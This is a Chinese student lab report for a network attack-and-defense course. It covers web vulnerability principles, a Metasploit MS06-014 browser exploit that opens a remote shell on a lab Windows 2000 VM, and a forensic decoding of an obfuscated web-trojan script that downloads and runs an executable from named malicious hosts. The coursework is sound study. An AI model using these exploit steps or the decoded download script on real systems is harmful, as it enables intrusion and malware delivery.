當(dāng)前位置:首頁(yè) > IT技術(shù) > 其他 > 正文

20212937 曾俊銘 2021-2022-2 《網(wǎng)絡(luò)攻防實(shí)踐》實(shí)踐報(bào)告
2022-05-29 22:46:26

20212937 曾俊銘 2021-2022-2 《網(wǎng)絡(luò)攻防實(shí)踐》實(shí)踐報(bào)告

1.實(shí)踐內(nèi)容

SQL注入漏洞原理

參數(shù)是用戶可控的,也就是前端傳入后端的參數(shù)的內(nèi)容是用戶可以控制的;
參數(shù)被帶入數(shù)據(jù)庫(kù)進(jìn)行查詢,也就是傳入的參數(shù)被拼接到SQL語(yǔ)句中,并且被帶入到數(shù)據(jù)庫(kù)進(jìn)行查詢;
xss漏洞原理

由于程序員在編寫代碼時(shí),未對(duì)用戶輸入的數(shù)據(jù)進(jìn)行處理、或者處理不當(dāng),從而導(dǎo)致惡意payload代碼被執(zhí)行。 簡(jiǎn)單來(lái)說(shuō)是對(duì)非預(yù)期輸入的過(guò)分信任!

CSRF漏洞原理

利用網(wǎng)站對(duì)于用戶網(wǎng)頁(yè)瀏覽器的信任,挾持用戶當(dāng)前已登陸的Web應(yīng)用程序,去執(zhí)行并非用戶本意的操作。通常由于服務(wù)端沒(méi)有對(duì)請(qǐng)求頭做嚴(yán)格過(guò)濾引起的。

SSRF漏洞原理

SSRF 形成的原因大都是由于服務(wù)端提供了從其他服務(wù)器應(yīng)用獲取數(shù)據(jù)的功能且沒(méi)有對(duì)目標(biāo)地址做過(guò)濾與限制

XXE漏洞原理

由于服務(wù)端未對(duì)提交的xml的數(shù)據(jù)中引入外部實(shí)體做必要的處理,而在外部實(shí)體中引入php偽協(xié)議從而造成的攻擊。

文件包含漏洞原理

文件包含函數(shù)加載的參數(shù)沒(méi)有經(jīng)過(guò)過(guò)濾或者嚴(yán)格的定義,可以被用戶控制,包含其他惡意文件,導(dǎo)致了執(zhí)行了非預(yù)期的代碼。

文件上傳漏洞原理

上傳的過(guò)程中如果對(duì)用戶上傳的文件未校驗(yàn)或者校驗(yàn)不嚴(yán)格、過(guò)濾不嚴(yán)格,那么惡意用戶就可以惡意修改上傳文件的類型或者繞過(guò)上傳限制,如果上傳了木馬文件,并且被服務(wù)器解析,那么就獲取了該站點(diǎn)的webshell。

解析漏洞原理

web服務(wù)器因?qū)ttp請(qǐng)求處理不當(dāng)導(dǎo)致將非可執(zhí)行的腳本,文件等當(dāng)做可執(zhí)行的腳本,文件等執(zhí)行。

未授權(quán)訪問(wèn)漏洞原理

需要安全配置或權(quán)限認(rèn)證的地址、授權(quán)頁(yè)面存在缺陷導(dǎo)致其他用戶可以直接訪問(wèn)從而引發(fā)重要權(quán)限可被操作、數(shù)據(jù)庫(kù)或網(wǎng)站目錄等敏感信息泄露。

反序列化漏洞原理

程序沒(méi)有對(duì)用戶輸入的反序列化字符串進(jìn)行檢測(cè),導(dǎo)致反序列化過(guò)程可以被惡意控制,進(jìn)而造成代碼執(zhí)行、getshell等一系列不可控的后果。

代碼執(zhí)行漏洞原理

當(dāng)應(yīng)用在調(diào)用一些能將字符串轉(zhuǎn)化成代碼的函數(shù)時(shí),沒(méi)有考慮用是否能夠控制這個(gè)字符串,

命令執(zhí)行漏洞原理

應(yīng)用有時(shí)需要調(diào)用一些執(zhí)行系統(tǒng)命令的函數(shù),沒(méi)有對(duì)用戶輸入做嚴(yán)格的檢查過(guò)濾,導(dǎo)致用戶可以控制命令執(zhí)行函數(shù)中的參數(shù),將惡意系統(tǒng)命令注入到正常命令中,造成命令執(zhí)行攻擊

邏輯漏洞原理

應(yīng)用程序執(zhí)行的邏輯存在某種缺陷。大部分邏輯缺陷表現(xiàn)為開發(fā)者在思考過(guò)程中做出的特殊假設(shè)存在明顯或隱含的錯(cuò)誤,通俗點(diǎn)來(lái)說(shuō),有的開發(fā)者會(huì)這樣認(rèn)為,如果發(fā)生A,就會(huì)出現(xiàn)B,因此我執(zhí)行C。沒(méi)有考慮如果發(fā)生X會(huì)怎么樣,這種錯(cuò)誤的假設(shè)會(huì)造成許多安全漏洞。

實(shí)驗(yàn)要求:
(1)web瀏覽器滲透攻擊

任務(wù):使用攻擊機(jī)和Windows靶機(jī)進(jìn)行瀏覽器滲透攻擊實(shí)驗(yàn),體驗(yàn)網(wǎng)頁(yè)木馬構(gòu)造及實(shí)施瀏覽器攻擊的實(shí)際過(guò)程。

(2)取證分析實(shí)踐—網(wǎng)頁(yè)木馬攻擊場(chǎng)景分析

(3)攻防對(duì)抗實(shí)踐—web瀏覽器滲透攻擊攻防

2.實(shí)踐過(guò)程

2.1 web瀏覽器滲透攻擊

任務(wù):使用攻擊機(jī)和Windows靶機(jī)進(jìn)行瀏覽器滲透攻擊實(shí)驗(yàn),體驗(yàn)網(wǎng)頁(yè)木馬構(gòu)造及實(shí)施瀏覽器攻擊的實(shí)際過(guò)程。

實(shí)驗(yàn)環(huán)境:

攻擊機(jī) Kali IP:192.168.200.2

靶機(jī) Windows2kServer IP:192.168.200.3

使用Metasploit中的MS06-014滲透攻擊模塊。

打開kali,進(jìn)入命令輸入界面,輸入命令msfconsole,打開metasploit,進(jìn)入其控制界面。
image

輸入命令search MS06-014搜索MS06-014漏洞,可以得到針對(duì)這個(gè)漏洞的滲透攻擊模塊。
image

接著輸入命令use exploit/windows/browser/ie_createobject進(jìn)入該滲透攻擊模塊。
image

選擇PAYLOAD為任意遠(yuǎn)程Shell連接。

輸入命令show payloads查看payloads。
image

輸入命令set payload windows/shell/bind_tcp
image

運(yùn)行exploit,構(gòu)造出惡意網(wǎng)頁(yè)木馬腳本。

輸入命令set Lhost 192.168.200.2,將kali設(shè)置本地IP為攻擊機(jī)。
image

輸入exploit開始攻擊,惡意服務(wù)器建立。
image

在靶機(jī)win2k環(huán)境中啟動(dòng)瀏覽器,驗(yàn)證與服務(wù)器的連通性,并訪問(wèn)而已網(wǎng)頁(yè)木馬腳本URL。

在靶機(jī)環(huán)境中啟動(dòng)瀏覽器訪問(wèn)這個(gè)惡意URL:http://192.168.200.2:8080/Po3kpZx。
image

在攻擊機(jī)的Metasploit軟件中查看滲透攻擊狀態(tài),并通過(guò)成功滲透攻擊后建立起的遠(yuǎn)程控制會(huì)話SESSION,在靶機(jī)上遠(yuǎn)程執(zhí)行命令。

回到攻擊機(jī)上可以看到,一個(gè)靶機(jī)到攻擊機(jī)的session被建立。
image

使用命令sessions 1 查看我們控制的主機(jī)為Windows 2000,版本為5.00.2195。
image

2.2 取證分析實(shí)踐—網(wǎng)頁(yè)木馬攻擊場(chǎng)景分析

①訪問(wèn)start.html,在這個(gè)文件中給出了new09.htm的地址。

用記事本打開start.html,分析發(fā)現(xiàn)在該網(wǎng)頁(yè)嵌入了一個(gè)內(nèi)聯(lián)框架,指向了一個(gè)網(wǎng)頁(yè)new09.htm,且該內(nèi)聯(lián)框架高度寬度為0,不易發(fā)現(xiàn)。從這兩處可以看出start.html文件在引用new09.htm文件時(shí)沒(méi)有寫絕對(duì)路徑,所以new09.htm文件與start.html文件在同一目錄下。
image
image

查看new09.htm文件。
image

②在進(jìn)入 htm 后,每解密出一個(gè)文件地址,請(qǐng)對(duì)其作 32 位 MD5 散列,以散列值為文件名。

new09.htm 文件中,用iframe引用了一個(gè)http://aa.18dd.net/aa/kl.htm文件,又用javascript引用了一個(gè)http://js.users.#/1299644.js文件。對(duì)它們分別作MD5散列:
image
image

③如果解密出的地址給出的是網(wǎng)頁(yè)或腳本文件,請(qǐng)繼續(xù)解密;如果解密出的地址是二進(jìn)制程序文件,進(jìn)行靜態(tài)反匯編或動(dòng)態(tài)調(diào)試;重復(fù)以上過(guò)程直到這些文件被全部分析完成。

在hashed文件夾下找到這兩個(gè)文件:7f60672dcd6b5e90b6772545ee219bd3和23180a42a2ff1192150231b44ffdf3d3,用記事本打開:
image
image

第二個(gè)文件中不是我們想要的內(nèi)容,第一個(gè)文件中的內(nèi)容使用XXTEABase64加密方法,到加密密鑰就在倒數(shù)第三行中:t=utf8to16(xxtea_decrypt(base64decode(t), 'x73x63x72x69x70x74'));將x73x63x72x69x70x74使用十六進(jìn)制轉(zhuǎn)字符串的操作,即可得到密鑰script:
image

使用https://cycy.sourceforge.io/xxtea/進(jìn)行XXTEABase64解密:在密鑰一欄中填入“script”,在下面大的文本框中粘貼7f60672dcd6b5e90b6772545ee219bd3.txt文件的全部?jī)?nèi)容,點(diǎn)“解密”,文本框的內(nèi)容變?yōu)椋?br/> image

完整內(nèi)容如下:(一段代碼)

然后對(duì)引號(hào)內(nèi)的十六進(jìn)制數(shù)進(jìn)行轉(zhuǎn)字符串的操作,便可以得到以下內(nèi)容:
image

完整內(nèi)容如下:
function init(){document.write();} window.onload = init; if(document.cookie.indexOf('OK')==-1){ try{var e; var ado=(document.createElement("object")); ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as=ado.createobject("Adodb.Stream","")} catch(e){}; finally{ var expires=new Date(); expires.setTime(expires.getTime()246060*1000); document.cookie='ce=windowsxp;path=/;expires='expires.toGMTString(); if(e!="[object Error]"){ document.write(" VPobGXIaRhZxDYlOkxARv

分析該代碼,可以發(fā)現(xiàn)document.location加載payload,且下一行跟了一個(gè)可執(zhí)行文件tppBbJMsCPXw.exe猜測(cè)該文件是通過(guò)之前的URL下載靶機(jī)上的。
image

打開靶機(jī)任務(wù)管理器查看正在運(yùn)行的進(jìn)程,可以發(fā)現(xiàn)上述可執(zhí)行文件正在運(yùn)行:
image

3.學(xué)習(xí)中遇到的問(wèn)題及解決

  • 問(wèn)題1:查看SESSION失敗
    image

  • 問(wèn)題1解決方案:使用命令行 sessions 1

  • 問(wèn)題2:不知道如何十六進(jìn)制轉(zhuǎn)換文本字符

  • 問(wèn)題2解決方案:百度了一下,發(fā)現(xiàn)有很多轉(zhuǎn)換器...

4.實(shí)踐總結(jié)

這次的實(shí)驗(yàn)難度不小,還挺復(fù)雜,通過(guò)不斷的失敗,對(duì)WEB瀏覽器滲透攻擊有了基本的了解,對(duì)木馬病毒攻擊分析也有了一些了解,但最近身體不好,高燒不斷,情緒也是非常的低落,身體是革命的本錢,網(wǎng)絡(luò)安全很重要,身體健康也很重要,期待趕緊好起來(lái)吧。

本文摘自 :https://www.cnblogs.com/

開通會(huì)員,享受整站包年服務(wù)立即開通 >